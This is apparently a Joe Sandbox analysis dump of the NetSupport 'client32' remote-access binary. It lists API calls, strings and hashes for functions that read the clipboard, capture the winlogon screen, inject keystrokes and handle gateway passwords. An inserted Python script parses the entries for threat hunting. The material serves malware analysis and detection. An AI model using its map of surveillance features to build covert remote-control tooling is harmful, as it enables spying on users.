• e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
• String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
• API String ID: 3134831419-838605531
• Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
• Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
• Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
• Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID:
• String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
• API String ID: 0-293745777
• Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
• Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
• Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
• Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
APIs
• SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
• FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
• SetForegroundWindow.USER32(00000000), ref: 110934F1
  • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
  • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
  • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
  • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
• CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
  • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
  • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
  • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
• CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
  • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
• String ID: NSMClassList$NSMFindClassEvent
• API String ID: 1622498684-2883797795
• Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
• Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
• Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
• Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
APIs
• IsClipboardFormatAvailable.USER32(?), ref: 11033361
• GetClipboardData.USER32(?), ref: 1103337D
• GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
• GetLastError.KERNEL32 ref: 11033406
• GlobalUnlock.KERNEL32(00000000), ref: 11033426
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                                                                    • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                                                                    • API String ID: 1861668072-1296821031
                                                                                                                                                    • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                                                                    • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                                                                                    • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                                                                    • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
APIs
• FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
• LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
• LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLock
• String ID: ..\ctl32\Errorhan.cpp$hMap
• API String ID: 2752051264-327499879
• Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
• Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
• Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
• Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
APIs
Strings
• nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
• ..\ctl32\Remote.cpp, xrefs: 111133D4
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountIconicTick
• String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
• API String ID: 1307367305-2838568823
• Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
• Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
• Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
• Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
APIs
• IsIconic.USER32(000000FF), ref: 110C10AD
• ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
• BringWindowToTop.USER32(000000FF), ref: 110C10C7
• GetCurrentThreadId.KERNEL32 ref: 110C10E8
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$BringCurrentIconicShowThread
• String ID:
• API String ID: 4184413098-0
• Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
• Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
• Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
• Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
APIs
• DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
• keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ControlDevicekeybd_event
• String ID:
• API String ID: 1421710848-0
• Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
• Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
• Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
• Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
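The per-function entries above all follow one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Yara matches, Similarity), and the embedded source paths such as ..\ctl32\clipbrd.cpp, ..\ctl32\Errorhan.cpp and ..\ctl32\Remote.cpp are the kind of string an analyst lifts out of a client32 memory dump for hunting. The Python script below is an editor's example added to this page; it is not Joe Sandbox tooling or part of the report. It parses the plain-text form of these entries into records, rebuilds each function's ordered API call list, and collects the source-path strings. The sample text is abridged from three entries on this page; the record layout, the function names and the rule that source-path strings end in .cpp/.c/.h are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function entries (plain-text form) into records.
Editor's example for this page, not Joe Sandbox tooling; SAMPLE is abridged from page entries."""
import re

SECTIONS = ("APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity")
# "Name.MODULE(args), ref: ADDR" or, without an argument list, "Name.MODULE ref: ADDR"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)$")
# Source-path strings such as ..\ctl32\Remote.cpp, reusable as string indicators (assumed shape)
SRCPATH_RE = re.compile(r"^\.\.\\[\w\\.\-]+\.(?:cpp|c|h)$", re.IGNORECASE)

# Constructed sample: three entries abridged from this page ("Download File" residue removed)
SAMPLE = r"""
APIs
• FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
• LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
• LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLock
• String ID: ..\ctl32\Errorhan.cpp$hMap
• API String ID: 2752051264-327499879
APIs
Strings
• nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
• ..\ctl32\Remote.cpp, xrefs: 111133D4
Similarity
• API ID: CountIconicTick
• String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
APIs
• IsIconic.USER32(000000FF), ref: 110C10AD
• ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
• BringWindowToTop.USER32(000000FF), ref: 110C10C7
• GetCurrentThreadId.KERNEL32 ref: 110C10E8
Similarity
• API ID: Window$BringCurrentIconicShowThread
• String ID:
• API String ID: 4184413098-0
"""

def parse_entries(text):
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every entry opens with an APIs header
                cur = {"apis": [], "strings": [], "source": {}, "associated": [],
                       "snapshot": "", "yara": [], "similarity": {}}
                entries.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                cur["apis"].append({"name": m["name"], "module": m["module"], "args": args, "ref": m["ref"]})
        elif section == "Strings":  # "text, xrefs: ADDR"; the text itself may contain commas
            text_part, sep, xref = item.rpartition(", xrefs: ")
            cur["strings"].append({"text": text_part if sep else item, "xref": xref if sep else ""})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(item)
            if m:
                cur["source"] = {"file": m["file"], "offset": m["offset"], "based_on_pe": m["pe"].lower() == "true"}
            elif item.startswith("Associated:"):
                cur["associated"].append(item.partition(":")[2].strip())
        elif section == "Joe Sandbox IDA Plugin" and item.startswith("Snapshot File:"):
            cur["snapshot"] = item.partition(":")[2].strip()
        elif section == "Yara matches":
            cur["yara"].append(item)
        elif section == "Similarity":  # "Key: value"; value may be empty (String ID)
            key, _, value = item.partition(":")
            cur["similarity"][key.strip()] = value.strip()
    return entries

def api_sequence(entry):
    """Ordered MODULE!Name list for one function, for comparing across samples."""
    return [f"{a['module']}!{a['name']}" for a in entry["apis"]]

def source_path_indicators(entries):
    """Collect ..\\dir\\file.cpp-style strings from 'Strings' and the $-joined 'String ID'."""
    found = set()
    for e in entries:
        cands = [s["text"] for s in e["strings"]] + e["similarity"].get("String ID", "").split("$")
        found.update(c.strip() for c in cands if SRCPATH_RE.match(c.strip()))
    return sorted(found)

if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    print([api_sequence(r) for r in recs], source_path_indicators(recs))
```

Two details of the layout drive the parser: an API line may carry no argument list at all (GetCurrentThreadId.KERNEL32 ref: 110C10E8 above), so the parenthesised group is optional, and the Similarity "String ID" is the report's "$"-joined form of the strings listed under Strings (compare the Remote.cpp entry), so splitting on "$" recovers the individual strings even for entries whose Strings section is empty. Only the source-path strings are kept as indicators; asserts such as "pData && pSize" or "hMap" are too generic to hunt on.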
                                                                                                                                                    APIs
                                                                                                                                                    • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                                                                                    • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Clipboard$DataFormatName
• String ID:
• API String ID: 3172747766-0
• Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
• Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
• Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
• Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
• String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
• API String ID: 2942389153-3574733319
• Opcode ID: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
• Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
• Opcode Fuzzy Hash: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
• Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
APIs
• _memset.LIBCMT ref: 6CA8CDF0
• EnterCriticalSection.KERNEL32(6CACB898,00000000,?), ref: 6CA8CE13
• InterlockedIncrement.KERNEL32(-6CACCB16), ref: 6CA8CE29
• InterlockedIncrement.KERNEL32(-6CACCB86), ref: 6CA8CE2F
  • Part of subcall function 6CA97D00: __vswprintf.LIBCMT ref: 6CA97D26
• LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8CE36
• _free.LIBCMT ref: 6CA8CF2C
• _free.LIBCMT ref: 6CA8CFD7
  • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
  • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
• _free.LIBCMT ref: 6CA8D029
• _free.LIBCMT ref: 6CA8D0CA
• _free.LIBCMT ref: 6CA8D109
• _free.LIBCMT ref: 6CA8D115
  • Part of subcall function 6CA85060: _free.LIBCMT ref: 6CA8506A
  • Part of subcall function 6CA85060: _malloc.LIBCMT ref: 6CA85090
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: _free$CritiuserncrementInterlockedSection$EnterErrorFreeHeapLastLeave__vswprintf_malloc_memset
• String ID: APPTYPE=%d$CMD=CTL_BROWSE$CONTEXT=%s$CSPEC=%s$CTLTYPE=%d$GSK$GSK=%s$Gateway_Gsk$Gateway_Name$Gateway_Password$Gateway_Username$MATCH_NAME=%s$PWD=%s$REQHOSTNAME=1$REQUSERNAME=1$SERVICETYPE=CLASS$SERVICETYPE=DEPT$USER=%s$WANTSHELP=1
• API String ID: 2543302378-3410294771
• Opcode ID: 8c66819d9a99394b111bab407e7a735a7f35679957059c24d5457507308f3a0b
• Instruction ID: 272d45ebfc2e38a7d9ce1362faabfaa524075c18b64d03bdfffca258a6bef862
• Opcode Fuzzy Hash: 8c66819d9a99394b111bab407e7a735a7f35679957059c24d5457507308f3a0b
• Instruction Fuzzy Hash: DA9156B2D0021AABDB21DB94CD41FFE77B8AF44208F044599A509B7A41E7309ACCCFB5
APIs
• OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
• OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
• OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
• WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
• OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
• GetDC.USER32(00000000), ref: 110B31E8
• CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
• CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
• SelectObject.GDI32(00000000,00000000), ref: 110B3236
• GetTickCount.KERNEL32 ref: 110B323F
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
• GetTickCount.KERNEL32 ref: 110B327F
• GetLastError.KERNEL32(00000000), ref: 110B328E
• GdiFlush.GDI32 ref: 110B32A2
• SelectObject.GDI32(00000000,?), ref: 110B32AD
• DeleteObject.GDI32(00000000), ref: 110B32B4
• SetEvent.KERNEL32(?), ref: 110B32BE
• DeleteDC.GDI32(00000000), ref: 110B32C8
• ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
• UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
• CloseHandle.KERNEL32(00000000), ref: 110B32E5
• CloseHandle.KERNEL32(00000000), ref: 110B3309
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
• String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
• API String ID: 2071925733-2101319552
• Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
• Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
• Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
• Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
APIs
  • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
• GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
• wsprintfA.USER32 ref: 1100553D
• DeleteObject.GDI32(?), ref: 11005592
• DeleteObject.GDI32(?), ref: 1100559B
• SelectObject.GDI32(?,?), ref: 110055B2
• DeleteObject.GDI32(?), ref: 110055B8
• DeleteDC.GDI32(?), ref: 110055BE
• SelectObject.GDI32(?,?), ref: 110055CF
• DeleteObject.GDI32(?), ref: 110055D8
• DeleteDC.GDI32(?), ref: 110055DE
• DeleteObject.GDI32(?), ref: 110055EF
• DeleteObject.GDI32(?), ref: 1100561A
• DeleteObject.GDI32(?), ref: 11005638
• DeleteObject.GDI32(?), ref: 11005641
• ShowWindow.USER32(?,00000009), ref: 1100566F
• PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
• String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
• API String ID: 2789700732-770455996
• Opcode ID: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
• Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
• Opcode Fuzzy Hash: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
• Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
APIs
• LoadLibraryA.KERNEL32(psapi.dll,1EF76653,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,75730BD0,00000000), ref: 11138283
  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
